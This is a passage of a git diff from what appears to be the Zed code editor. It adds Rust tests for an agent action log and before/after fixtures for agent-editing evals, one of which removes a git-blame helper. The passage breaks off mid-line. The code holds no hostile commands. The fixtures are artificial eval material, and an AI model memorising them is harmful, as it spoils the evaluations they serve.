buffer.update(cx, |buffer, cx| buffer.set_text("content", cx)); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); + project + .update(cx, |project, cx| project.save_buffer(buffer.clone(), cx)) + .await + .unwrap(); + assert!(fs.is_file(path!("/dir/new_file").as_ref()).await); + cx.run_until_parked(); + assert_eq!( + unreviewed_hunks(&action_log, cx), + vec![( + buffer.clone(), + vec![HunkStatus { + range: Point::new(0, 0)..Point::new(0, 7), + diff_status: DiffHunkStatusKind::Added, + old_text: "".into(), + }], + )] + ); + + action_log + .update(cx, |log, cx| { + log.reject_edits_in_ranges( + buffer.clone(), + vec![Point::new(0, 0)..Point::new(0, 11)], + cx, + ) + }) + .await + .unwrap(); + cx.run_until_parked(); + assert!(!fs.is_file(path!("/dir/new_file").as_ref()).await); + assert_eq!(unreviewed_hunks(&action_log, cx), vec![]); + } + + #[gpui::test(iterations = 100)] + async fn test_random_diffs(mut rng: StdRng, cx: &mut TestAppContext) { + init_test(cx); + + let operations = env::var("OPERATIONS") + .map(|i| i.parse().expect("invalid `OPERATIONS` variable")) + .unwrap_or(20); + + let text = RandomCharIter::new(&mut rng).take(50).collect::(); + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({"file": text})).await; + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let action_log = cx.new(|_| ActionLog::new(project.clone())); + let file_path = project + .read_with(cx, |project, cx| project.find_project_path("dir/file", cx)) + .unwrap(); + let buffer = project + .update(cx, |project, cx| project.open_buffer(file_path, cx)) + .await + .unwrap(); + + action_log.update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); + + for _ in 0..operations { + match rng.gen_range(0..100) { + 0..25 => { + action_log.update(cx, |log, cx| { + let range = buffer.read(cx).random_byte_range(0, &mut rng); + log::info!("keeping edits in range {:?}", range); + log.keep_edits_in_range(buffer.clone(), range, cx) + }); + } + 25..50 => { + action_log + .update(cx, |log, cx| { + let range = buffer.read(cx).random_byte_range(0, &mut rng); + log::info!("rejecting edits in range {:?}", range); + log.reject_edits_in_ranges(buffer.clone(), vec![range], cx) + }) + .await + .unwrap(); + } + _ => { + let is_agent_change = rng.gen_bool(0.5); + if is_agent_change { + log::info!("agent edit"); + } else { + log::info!("user edit"); + } + cx.update(|cx| { + buffer.update(cx, |buffer, cx| buffer.randomly_edit(&mut rng, 1, cx)); + if is_agent_change { + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + } + }); + } + } + + if rng.gen_bool(0.2) { + quiesce(&action_log, &buffer, cx); + } + } + + quiesce(&action_log, &buffer, cx); + + fn quiesce( + action_log: &Entity, + buffer: &Entity, + cx: &mut TestAppContext, + ) { + log::info!("quiescing..."); + cx.run_until_parked(); + action_log.update(cx, |log, cx| { + let tracked_buffer = log.tracked_buffers.get(&buffer).unwrap(); + let mut old_text = tracked_buffer.base_text.clone(); + let new_text = buffer.read(cx).as_rope(); + for edit in tracked_buffer.unreviewed_changes.edits() { + let old_start = old_text.point_to_offset(Point::new(edit.new.start, 0)); + let old_end = old_text.point_to_offset(cmp::min( + Point::new(edit.new.start + edit.old_len(), 0), + old_text.max_point(), + )); + old_text.replace( + old_start..old_end, + &new_text.slice_rows(edit.new.clone()).to_string(), + ); + } + pretty_assertions::assert_eq!(old_text.to_string(), new_text.to_string()); + }) + } + } + + #[derive(Debug, Clone, PartialEq, Eq)] + struct HunkStatus { + range: Range, + diff_status: DiffHunkStatusKind, + old_text: String, + } + + fn unreviewed_hunks( + action_log: &Entity, + cx: &TestAppContext, + ) -> Vec<(Entity, Vec)> { + cx.read(|cx| { + action_log + .read(cx) + .changed_buffers(cx) + .into_iter() + .map(|(buffer, diff)| { + let snapshot = buffer.read(cx).snapshot(); + ( + buffer, + diff.read(cx) + .hunks(&snapshot, cx) + .map(|hunk| HunkStatus { + diff_status: hunk.status().kind, + range: hunk.range, + old_text: diff + .read(cx) + .base_text() + .text_for_range(hunk.diff_base_byte_range) + .collect(), + }) + .collect(), + ) + }) + .collect() + }) + } +} diff --git a/crates/agent/src/tools/evals/fixtures/delete_run_git_blame/after.rs b/crates/agent/src/tools/evals/fixtures/delete_run_git_blame/after.rs new file mode 100644 index 0000000000000000000000000000000000000000..89277be4436bf000f4b061d8b89fef5f489f9fea --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/delete_run_git_blame/after.rs @@ -0,0 +1,328 @@ +use crate::commit::get_messages; +use crate::{GitRemote, Oid}; +use anyhow::{Context as _, Result, anyhow}; +use collections::{HashMap, HashSet}; +use futures::AsyncWriteExt; +use gpui::SharedString; +use serde::{Deserialize, Serialize}; +use std::process::Stdio; +use std::{ops::Range, path::Path}; +use text::Rope; +use time::OffsetDateTime; +use time::UtcOffset; +use time::macros::format_description; + +pub use git2 as libgit; + +#[derive(Debug, Clone, Default)] +pub struct Blame { + pub entries: Vec, + pub messages: HashMap, + pub remote_url: Option, +} + +#[derive(Clone, Debug, Default)] +pub struct ParsedCommitMessage { + pub message: SharedString, + pub permalink: Option, + pub pull_request: Option, + pub remote: Option, +} + +impl Blame { + pub async fn for_path( + git_binary: &Path, + working_directory: &Path, + path: &Path, + content: &Rope, + remote_url: Option, + ) -> Result { + let output = run_git_blame(git_binary, working_directory, path, content).await?; + let mut entries = parse_git_blame(&output)?; + entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); + + let mut unique_shas = HashSet::default(); + + for entry in entries.iter_mut() { + unique_shas.insert(entry.sha); + } + + let shas = unique_shas.into_iter().collect::>(); + let messages = get_messages(working_directory, &shas) + .await + .context("failed to get commit messages")?; + + Ok(Self { + entries, + messages, + remote_url, + }) + } +} + +const GIT_BLAME_NO_COMMIT_ERROR: &str = "fatal: no such ref: HEAD"; +const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; + +#[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] +pub struct BlameEntry { + pub sha: Oid, + + pub range: Range, + + pub original_line_number: u32, + + pub author: Option, + pub author_mail: Option, + pub author_time: Option, + pub author_tz: Option, + + pub committer_name: Option, + pub committer_email: Option, + pub committer_time: Option, + pub committer_tz: Option, + + pub summary: Option, + + pub previous: Option, + pub filename: String, +} + +impl BlameEntry { + // Returns a BlameEntry by parsing the first line of a `git blame --incremental` + // entry. The line MUST have this format: + // + // <40-byte-hex-sha1> + fn new_from_blame_line(line: &str) -> Result { + let mut parts = line.split_whitespace(); + + let sha = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing sha from {line}"))?; + + let original_line_number = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing original line number from {line}"))?; + let final_line_number = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing final line number from {line}"))?; + + let line_count = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing line count from {line}"))?; + + let start_line = final_line_number.saturating_sub(1); + let end_line = start_line + line_count; + let range = start_line..end_line; + + Ok(Self { + sha, + range, + original_line_number, + ..Default::default() + }) + } + + pub fn author_offset_date_time(&self) -> Result { + if let (Some(author_time), Some(author_tz)) = (self.author_time, &self.author_tz) { + let format = format_description!("[offset_hour][offset_minute]"); + let offset = UtcOffset::parse(author_tz, &format)?; + let date_time_utc = OffsetDateTime::from_unix_timestamp(author_time)?; + + Ok(date_time_utc.to_offset(offset)) + } else { + // Directly return current time in UTC if there's no committer time or timezone + Ok(time::OffsetDateTime::now_utc()) + } + } +} + +// parse_git_blame parses the output of `git blame --incremental`, which returns +// all the blame-entries for a given path incrementally, as it finds them. +// +// Each entry *always* starts with: +// +// <40-byte-hex-sha1> +// +// Each entry *always* ends with: +// +// filename +// +// Line numbers are 1-indexed. +// +// A `git blame --incremental` entry looks like this: +// +// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 2 2 1 +// author Joe Schmoe +// author-mail +// author-time 1709741400 +// author-tz +0100 +// committer Joe Schmoe +// committer-mail +// committer-time 1709741400 +// committer-tz +0100 +// summary Joe's cool commit +// previous 486c2409237a2c627230589e567024a96751d475 index.js +// filename index.js +// +// If the entry has the same SHA as an entry that was already printed then no +// signature information is printed: +// +// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 3 4 1 +// previous 486c2409237a2c627230589e567024a96751d475 index.js +// filename index.js +// +// More about `--incremental` output: https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-blame.html +fn parse_git_blame(output: &str) -> Result> { + let mut entries: Vec = Vec::new(); + let mut index: HashMap = HashMap::default(); + + let mut current_entry: Option = None; + + for line in output.lines() { + let mut done = false; + + match &mut current_entry { + None => { + let mut new_entry = BlameEntry::new_from_blame_line(line)?; + + if let Some(existing_entry) = index + .get(&new_entry.sha) + .and_then(|slot| entries.get(*slot)) + { + new_entry.author.clone_from(&existing_entry.author); + new_entry + .author_mail + .clone_from(&existing_entry.author_mail); + new_entry.author_time = existing_entry.author_time; + new_entry.author_tz.clone_from(&existing_entry.author_tz); + new_entry + .committer_name + .clone_from(&existing_entry.committer_name); + new_entry + .committer_email + .clone_from(&existing_entry.committer_email); + new_entry.committer_time = existing_entry.committer_time; + new_entry + .committer_tz + .clone_from(&existing_entry.committer_tz); + new_entry.summary.clone_from(&existing_entry.summary); + } + + current_entry.replace(new_entry); + } + Some(entry) => { + let Some((key, value)) = line.split_once(' ') else { + continue; + }; + let is_committed = !entry.sha.is_zero(); + match key { + "filename" => { + entry.filename = value.into(); + done = true; + } + "previous" => entry.previous = Some(value.into()), + + "summary" if is_committed => entry.summary = Some(value.into()), + "author" if is_committed => entry.author = Some(value.into()), + "author-mail" if is_committed => entry.author_mail = Some(value.into()), + "author-time" if is_committed => { + entry.author_time = Some(value.parse::()?) + } + "author-tz" if is_committed => entry.author_tz = Some(value.into()), + + "committer" if is_committed => entry.committer_name = Some(value.into()), + "committer-mail" if is_committed => entry.committer_email = Some(value.into()), + "committer-time" if is_committed => { + entry.committer_time = Some(value.parse::()?) + } + "committer-tz" if is_committed => entry.committer_tz = Some(value.into()), + _ => {} + } + } + }; + + if done { + if let Some(entry) = current_entry.take() { + index.insert(entry.sha, entries.len()); + + // We only want annotations that have a commit. + if !entry.sha.is_zero() { + entries.push(entry); + } + } + } + } + + Ok(entries) +} + +#[cfg(test)] +mod tests { + use std::path::PathBuf; + + use super::BlameEntry; + use super::parse_git_blame; + + fn read_test_data(filename: &str) -> String { + let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); + path.push("test_data"); + path.push(filename); + + std::fs::read_to_string(&path) + .unwrap_or_else(|_| panic!("Could not read test data at {:?}. Is it generated?", path)) + } + + fn assert_eq_golden(entries: &Vec, golden_filename: &str) { + let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); + path.push("test_data"); + path.push("golden"); + path.push(format!("{}.json", golden_filename)); + + let mut have_json = + serde_json::to_string_pretty(&entries).expect("could not serialize entries to JSON"); + // We always want to save with a trailing newline. + have_json.push('\n'); + + let update = std::env::var("UPDATE_GOLDEN") + .map(|val| val.eq_ignore_ascii_case("true")) + .unwrap_or(false); + + if update { + std::fs::create_dir_all(path.parent().unwrap()) + .expect("could not create golden test data directory"); + std::fs::write(&path, have_json).expect("could not write out golden data"); + } else { + let want_json = + std::fs::read_to_string(&path).unwrap_or_else(|_| { + panic!("could not read golden test data file at {:?}. Did you run the test with UPDATE_GOLDEN=true before?", path); + }).replace("\r\n", "\n"); + + pretty_assertions::assert_eq!(have_json, want_json, "wrong blame entries"); + } + } + + #[test] + fn test_parse_git_blame_not_committed() { + let output = read_test_data("blame_incremental_not_committed"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_not_committed"); + } + + #[test] + fn test_parse_git_blame_simple() { + let output = read_test_data("blame_incremental_simple"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_simple"); + } + + #[test] + fn test_parse_git_blame_complex() { + let output = read_test_data("blame_incremental_complex"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_complex"); + } +} diff --git a/crates/agent/src/tools/evals/fixtures/delete_run_git_blame/before.rs b/crates/agent/src/tools/evals/fixtures/delete_run_git_blame/before.rs new file mode 100644 index 0000000000000000000000000000000000000000..36fccb513271265ff7ae3d54b6f974beeb809737 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/delete_run_git_blame/before.rs @@ -0,0 +1,371 @@ +use crate::commit::get_messages; +use crate::{GitRemote, Oid}; +use anyhow::{Context as _, Result, anyhow}; +use collections::{HashMap, HashSet}; +use futures::AsyncWriteExt; +use gpui::SharedString; +use serde::{Deserialize, Serialize}; +use std::process::Stdio; +use std::{ops::Range, path::Path}; +use text::Rope; +use time::OffsetDateTime; +use time::UtcOffset; +use time::macros::format_description; + +pub use git2 as libgit; + +#[derive(Debug, Clone, Default)] +pub struct Blame { + pub entries: Vec, + pub messages: HashMap, + pub remote_url: Option, +} + +#[derive(Clone, Debug, Default)] +pub struct ParsedCommitMessage { + pub message: SharedString, + pub permalink: Option, + pub pull_request: Option, + pub remote: Option, +} + +impl Blame { + pub async fn for_path( + git_binary: &Path, + working_directory: &Path, + path: &Path, + content: &Rope, + remote_url: Option, + ) -> Result { + let output = run_git_blame(git_binary, working_directory, path, content).await?; + let mut entries = parse_git_blame(&output)?; + entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); + + let mut unique_shas = HashSet::default(); + + for entry in entries.iter_mut() { + unique_shas.insert(entry.sha); + } + + let shas = unique_shas.into_iter().collect::>(); + let messages = get_messages(working_directory, &shas) + .await + .context("failed to get commit messages")?; + + Ok(Self { + entries, + messages, + remote_url, + }) + } +} + +const GIT_BLAME_NO_COMMIT_ERROR: &str = "fatal: no such ref: HEAD"; +const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; + +async fn run_git_blame( + git_binary: &Path, + working_directory: &Path, + path: &Path, + contents: &Rope, +) -> Result { + let mut child = util::command::new_smol_command(git_binary) + .current_dir(working_directory) + .arg("blame") + .arg("--incremental") + .arg("--contents") + .arg("-") + .arg(path.as_os_str()) + .stdin(Stdio::piped()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()) + .spawn() + .context("starting git blame process")?; + + let stdin = child + .stdin + .as_mut() + .context("failed to get pipe to stdin of git blame command")?; + + for chunk in contents.chunks() { + stdin.write_all(chunk.as_bytes()).await?; + } + stdin.flush().await?; + + let output = child.output().await.context("reading git blame output")?; + + if !output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); + if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { + return Ok(String::new()); + } + anyhow::bail!("git blame process failed: {stderr}"); + } + + Ok(String::from_utf8(output.stdout)?) +} + +#[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] +pub struct BlameEntry { + pub sha: Oid, + + pub range: Range, + + pub original_line_number: u32, + + pub author: Option, + pub author_mail: Option, + pub author_time: Option, + pub author_tz: Option, + + pub committer_name: Option, + pub committer_email: Option, + pub committer_time: Option, + pub committer_tz: Option, + + pub summary: Option, + + pub previous: Option, + pub filename: String, +} + +impl BlameEntry { + // Returns a BlameEntry by parsing the first line of a `git blame --incremental` + // entry. The line MUST have this format: + // + // <40-byte-hex-sha1> + fn new_from_blame_line(line: &str) -> Result { + let mut parts = line.split_whitespace(); + + let sha = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing sha from {line}"))?; + + let original_line_number = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing original line number from {line}"))?; + let final_line_number = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing final line number from {line}"))?; + + let line_count = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing line count from {line}"))?; + + let start_line = final_line_number.saturating_sub(1); + let end_line = start_line + line_count; + let range = start_line..end_line; + + Ok(Self { + sha, + range, + original_line_number, + ..Default::default() + }) + } + + pub fn author_offset_date_time(&self) -> Result { + if let (Some(author_time), Some(author_tz)) = (self.author_time, &self.author_tz) { + let format = format_description!("[offset_hour][offset_minute]"); + let offset = UtcOffset::parse(author_tz, &format)?; + let date_time_utc = OffsetDateTime::from_unix_timestamp(author_time)?; + + Ok(date_time_utc.to_offset(offset)) + } else { + // Directly return current time in UTC if there's no committer time or timezone + Ok(time::OffsetDateTime::now_utc()) + } + } +} + +// parse_git_blame parses the output of `git blame --incremental`, which returns +// all the blame-entries for a given path incrementally, as it finds them. +// +// Each entry *always* starts with: +// +// <40-byte-hex-sha1> +// +// Each entry *always* ends with: +// +// filename +// +// Line numbers are 1-indexed. +// +// A `git blame --incremental` entry looks like this: +// +// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 2 2 1 +// author Joe Schmoe +// author-mail +// author-time 1709741400 +// author-tz +0100 +// committer Joe Schmoe +// committer-mail +// committer-time 1709741400 +// committer-tz +0100 +// summary Joe's cool commit +// previous 486c2409237a2c627230589e567024a96751d475 index.js +// filename index.js +// +// If the entry has the same SHA as an entry that was already printed then no +// signature information is printed: +// +// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 3 4 1 +// previous 486c2409237a2c627230589e567024a96751d475 index.js +// filename index.js +// +// More about `--incremental` output: https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-blame.html +fn parse_git_blame(output: &str) -> Result> { + let mut entries: Vec = Vec::new(); + let mut index: HashMap = HashMap::default(); + + let mut current_entry: Option = None; + + for line in output.lines() { + let mut done = false; + + match &mut current_entry { + None => { + let mut new_entry = BlameEntry::new_from_blame_line(line)?; + + if let Some(existing_entry) = index + .get(&new_entry.sha) + .and_then(|slot| entries.get(*slot)) + { + new_entry.author.clone_from(&existing_entry.author); + new_entry + .author_mail + .clone_from(&existing_entry.author_mail); + new_entry.author_time = existing_entry.author_time; + new_entry.author_tz.clone_from(&existing_entry.author_tz); + new_entry + .committer_name + .clone_from(&existing_entry.committer_name); + new_entry + .committer_email + .clone_from(&existing_entry.committer_email); + new_entry.committer_time = existing_entry.committer_time; + new_entry + .committer_tz + .clone_from(&existing_entry.committer_tz); + new_entry.summary.clone_from(&existing_entry.summary); + } + + current_entry.replace(new_entry); + } + Some(entry) => { + let Some((key, value)) = line.split_once(' ') else { + continue; + }; + let is_committed = !entry.sha.is_zero(); + match key { + "filename" => { + entry.filename = value.into(); + done = true; + } + "previous" => entry.previous = Some(value.into()), + + "summary" if is_committed => entry.summary = Some(value.into()), + "author" if is_committed => entry.author = Some(value.into()), + "author-mail" if is_committed => entry.author_mail = Some(value.into()), + "author-time" if is_committed => { + entry.author_time = Some(value.parse::()?) + } + "author-tz" if is_committed => entry.author_tz = Some(value.into()), + + "committer" if is_committed => entry.committer_name = Some(value.into()), + "committer-mail" if is_committed => entry.committer_email = Some(value.into()), + "committer-time" if is_committed => { + entry.committer_time = Some(value.parse::()?) + } + "committer-tz" if is_committed => entry.committer_tz = Some(value.into()), + _ => {} + } + } + }; + + if done { + if let Some(entry) = current_entry.take() { + index.insert(entry.sha, entries.len()); + + // We only want annotations that have a commit. + if !entry.sha.is_zero() { + entries.push(entry); + } + } + } + } + + Ok(entries) +} + +#[cfg(test)] +mod tests { + use std::path::PathBuf; + + use super::BlameEntry; + use super::parse_git_blame; + + fn read_test_data(filename: &str) -> String { + let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); + path.push("test_data"); + path.push(filename); + + std::fs::read_to_string(&path) + .unwrap_or_else(|_| panic!("Could not read test data at {:?}. Is it generated?", path)) + } + + fn assert_eq_golden(entries: &Vec, golden_filename: &str) { + let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); + path.push("test_data"); + path.push("golden"); + path.push(format!("{}.json", golden_filename)); + + let mut have_json = + serde_json::to_string_pretty(&entries).expect("could not serialize entries to JSON"); + // We always want to save with a trailing newline. + have_json.push('\n'); + + let update = std::env::var("UPDATE_GOLDEN") + .map(|val| val.eq_ignore_ascii_case("true")) + .unwrap_or(false); + + if update { + std::fs::create_dir_all(path.parent().unwrap()) + .expect("could not create golden test data directory"); + std::fs::write(&path, have_json).expect("could not write out golden data"); + } else { + let want_json = + std::fs::read_to_string(&path).unwrap_or_else(|_| { + panic!("could not read golden test data file at {:?}. Did you run the test with UPDATE_GOLDEN=true before?", path); + }).replace("\r\n", "\n"); + + pretty_assertions::assert_eq!(have_json, want_json, "wrong blame entries"); + } + } + + #[test] + fn test_parse_git_blame_not_committed() { + let output = read_test_data("blame_incremental_not_committed"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_not_committed"); + } + + #[test] + fn test_parse_git_blame_simple() { + let output = read_test_data("blame_incremental_simple"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_simple"); + } + + #[test] + fn test_parse_git_blame_complex() { + let output = read_test_data("blame_incremental_complex"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_complex"); + } +} diff --git a/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/before.rs b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/before.rs new file mode 100644 index 0000000000000000000000000000000000000000..bdf160d8ffe2c605a9e995d6efe7227dce34eaab --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/before.rs @@ -0,0 +1,21343 @@ +#![allow(rustdoc::private_intra_doc_links)] +//! This is the place where everything editor-related is stored (data-wise) and displayed (ui-wise). +//! The main point of interest in this crate is [`Editor`] type, which is used in every other Zed part as a user input element. +//! It comes in different flavors: single line, multiline and a fixed height one. +//! +//! Editor contains of multiple large submodules: +//! * [`element`] — the place where all rendering happens +//! * [`display_map`] - chunks up text in the editor into the logical blocks, establishes coordinates and mapping between each of them. +//! Contains all metadata related to text transformations (folds, fake inlay text insertions, soft wraps, tab markup, etc.). +//! * [`inlay_hint_cache`] - is a storage of inlay hints out of LSP requests, responsible for querying LSP and updating `display_map`'s state accordingly. +//! +//! All other submodules and structs are mostly concerned with holding editor data about the way it displays current buffer region(s). +//! +//! If you're looking to improve Vim mode, you should check out Vim crate that wraps Editor and overrides its behavior. +pub mod actions; +mod blink_manager; +mod clangd_ext; +mod code_context_menus; +pub mod display_map; +mod editor_settings; +mod editor_settings_controls; +mod element; +mod git; +mod highlight_matching_bracket; +mod hover_links; +pub mod hover_popover; +mod indent_guides; +mod inlay_hint_cache; +pub mod items; +mod jsx_tag_auto_close; +mod linked_editing_ranges; +mod lsp_ext; +mod mouse_context_menu; +pub mod movement; +mod persistence; +mod proposed_changes_editor; +mod rust_analyzer_ext; +pub mod scroll; +mod selections_collection; +pub mod tasks; + +#[cfg(test)] +mod code_completion_tests; +#[cfg(test)] +mod editor_tests; +#[cfg(test)] +mod inline_completion_tests; +mod signature_help; +#[cfg(any(test, feature = "test-support"))] +pub mod test; + +pub(crate) use actions::*; +pub use actions::{AcceptEditPrediction, OpenExcerpts, OpenExcerptsSplit}; +use aho_corasick::AhoCorasick; +use anyhow::{Context as _, Result, anyhow}; +use blink_manager::BlinkManager; +use buffer_diff::DiffHunkStatus; +use client::{Collaborator, ParticipantIndex}; +use clock::ReplicaId; +use collections::{BTreeMap, HashMap, HashSet, VecDeque}; +use convert_case::{Case, Casing}; +use display_map::*; +pub use display_map::{ChunkRenderer, ChunkRendererContext, DisplayPoint, FoldPlaceholder}; +use editor_settings::GoToDefinitionFallback; +pub use editor_settings::{ + CurrentLineHighlight, EditorSettings, HideMouseMode, ScrollBeyondLastLine, SearchSettings, + ShowScrollbar, +}; +pub use editor_settings_controls::*; +use element::{AcceptEditPredictionBinding, LineWithInvisibles, PositionMap, layout_line}; +pub use element::{ + CursorLayout, EditorElement, HighlightedRange, HighlightedRangeLine, PointForPosition, +}; +use feature_flags::{DebuggerFeatureFlag, FeatureFlagAppExt}; +use futures::{ + FutureExt, + future::{self, Shared, join}, +}; +use fuzzy::StringMatchCandidate; + +use ::git::blame::BlameEntry; +use ::git::{Restore, blame::ParsedCommitMessage}; +use code_context_menus::{ + AvailableCodeAction, CodeActionContents, CodeActionsItem, CodeActionsMenu, CodeContextMenu, + CompletionsMenu, ContextMenuOrigin, +}; +use git::blame::{GitBlame, GlobalBlameRenderer}; +use gpui::{ + Action, Animation, AnimationExt, AnyElement, App, AppContext, AsyncWindowContext, + AvailableSpace, Background, Bounds, ClickEvent, ClipboardEntry, ClipboardItem, Context, + DispatchPhase, Edges, Entity, EntityInputHandler, EventEmitter, FocusHandle, FocusOutEvent, + Focusable, FontId, FontWeight, Global, HighlightStyle, Hsla, KeyContext, Modifiers, + MouseButton, MouseDownEvent, PaintQuad, ParentElement, Pixels, Render, ScrollHandle, + SharedString, Size, Stateful, Styled, Subscription, Task, TextStyle, TextStyleRefinement, + UTF16Selection, UnderlineStyle, UniformListScrollHandle, WeakEntity, WeakFocusHandle, Window, + div, impl_actions, point, prelude::*, pulsating_between, px, relative, size, +}; +use highlight_matching_bracket::refresh_matching_bracket_highlights; +use hover_links::{HoverLink, HoveredLinkState, InlayHighlight, find_file}; +pub use hover_popover::hover_markdown_style; +use hover_popover::{HoverState, hide_hover}; +use indent_guides::ActiveIndentGuidesState; +use inlay_hint_cache::{InlayHintCache, InlaySplice, InvalidationStrategy}; +pub use inline_completion::Direction; +use inline_completion::{EditPredictionProvider, InlineCompletionProviderHandle}; +pub use items::MAX_TAB_TITLE_LEN; +use itertools::Itertools; +use language::{ + AutoindentMode, BracketMatch, BracketPair, Buffer, Capability, CharKind, CodeLabel, + CursorShape, DiagnosticEntry, DiffOptions, EditPredictionsMode, EditPreview, HighlightedText, + IndentKind, IndentSize, Language, OffsetRangeExt, Point, Selection, SelectionGoal, TextObject, + TransactionId, TreeSitterOptions, WordsQuery, + language_settings::{ + self, InlayHintSettings, LspInsertMode, RewrapBehavior, WordsCompletionMode, + all_language_settings, language_settings, + }, + point_from_lsp, text_diff_with_options, +}; +use language::{BufferRow, CharClassifier, Runnable, RunnableRange, point_to_lsp}; +use linked_editing_ranges::refresh_linked_ranges; +use markdown::Markdown; +use mouse_context_menu::MouseContextMenu; +use persistence::DB; +use project::{ + ProjectPath, + debugger::{ + breakpoint_store::{ + BreakpointEditAction, BreakpointState, BreakpointStore, BreakpointStoreEvent, + }, + session::{Session, SessionEvent}, + }, +}; + +pub use git::blame::BlameRenderer; +pub use proposed_changes_editor::{ + ProposedChangeLocation, ProposedChangesEditor, ProposedChangesEditorToolbar, +}; +use smallvec::smallvec; +use std::{cell::OnceCell, iter::Peekable}; +use task::{ResolvedTask, RunnableTag, TaskTemplate, TaskVariables}; + +pub use lsp::CompletionContext; +use lsp::{ + CodeActionKind, CompletionItemKind, CompletionTriggerKind, DiagnosticSeverity, + InsertTextFormat, InsertTextMode, LanguageServerId, LanguageServerName, +}; + +use language::BufferSnapshot; +pub use lsp_ext::lsp_tasks; +use movement::TextLayoutDetails; +pub use multi_buffer::{ + Anchor, AnchorRangeExt, ExcerptId, ExcerptRange, MultiBuffer, MultiBufferSnapshot, PathKey, + RowInfo, ToOffset, ToPoint, +}; +use multi_buffer::{ + ExcerptInfo, ExpandExcerptDirection, MultiBufferDiffHunk, MultiBufferPoint, MultiBufferRow, + MultiOrSingleBufferOffsetRange, ToOffsetUtf16, +}; +use parking_lot::Mutex; +use project::{ + CodeAction, Completion, CompletionIntent, CompletionSource, DocumentHighlight, InlayHint, + Location, LocationLink, PrepareRenameResponse, Project, ProjectItem, ProjectTransaction, + TaskSourceKind, + debugger::breakpoint_store::Breakpoint, + lsp_store::{CompletionDocumentation, FormatTrigger, LspFormatTarget, OpenLspBufferHandle}, + project_settings::{GitGutterSetting, ProjectSettings}, +}; +use rand::prelude::*; +use rpc::{ErrorExt, proto::*}; +use scroll::{Autoscroll, OngoingScroll, ScrollAnchor, ScrollManager, ScrollbarAutoHide}; +use selections_collection::{ + MutableSelectionsCollection, SelectionsCollection, resolve_selections, +}; +use serde::{Deserialize, Serialize}; +use settings::{Settings, SettingsLocation, SettingsStore, update_settings_file}; +use smallvec::SmallVec; +use snippet::Snippet; +use std::sync::Arc; +use std::{ + any::TypeId, + borrow::Cow, + cell::RefCell, + cmp::{self, Ordering, Reverse}, + mem, + num::NonZeroU32, + ops::{ControlFlow, Deref, DerefMut, Not as _, Range, RangeInclusive}, + path::{Path, PathBuf}, + rc::Rc, + time::{Duration, Instant}, +}; +pub use sum_tree::Bias; +use sum_tree::TreeMap; +use text::{BufferId, FromAnchor, OffsetUtf16, Rope}; +use theme::{ + ActiveTheme, PlayerColor, StatusColors, SyntaxTheme, ThemeColors, ThemeSettings, + observe_buffer_font_size_adjustment, +}; +use ui::{ + ButtonSize, ButtonStyle, ContextMenu, Disclosure, IconButton, IconButtonShape, IconName, + IconSize, Key, Tooltip, h_flex, prelude::*, +}; +use util::{RangeExt, ResultExt, TryFutureExt, maybe, post_inc}; +use workspace::{ + Item as WorkspaceItem, ItemId, ItemNavHistory, OpenInTerminal, OpenTerminal, + RestoreOnStartupBehavior, SERIALIZATION_THROTTLE_TIME, SplitDirection, TabBarSettings, Toast, + ViewId, Workspace, WorkspaceId, WorkspaceSettings, + item::{ItemHandle, PreviewTabsSettings}, + notifications::{DetachAndPromptErr, NotificationId, NotifyTaskExt}, + searchable::SearchEvent, +}; + +use crate::hover_links::{find_url, find_url_from_range}; +use crate::signature_help::{SignatureHelpHiddenBy, SignatureHelpState}; + +pub const FILE_HEADER_HEIGHT: u32 = 2; +pub const MULTI_BUFFER_EXCERPT_HEADER_HEIGHT: u32 = 1; +pub const DEFAULT_MULTIBUFFER_CONTEXT: u32 = 2; +const 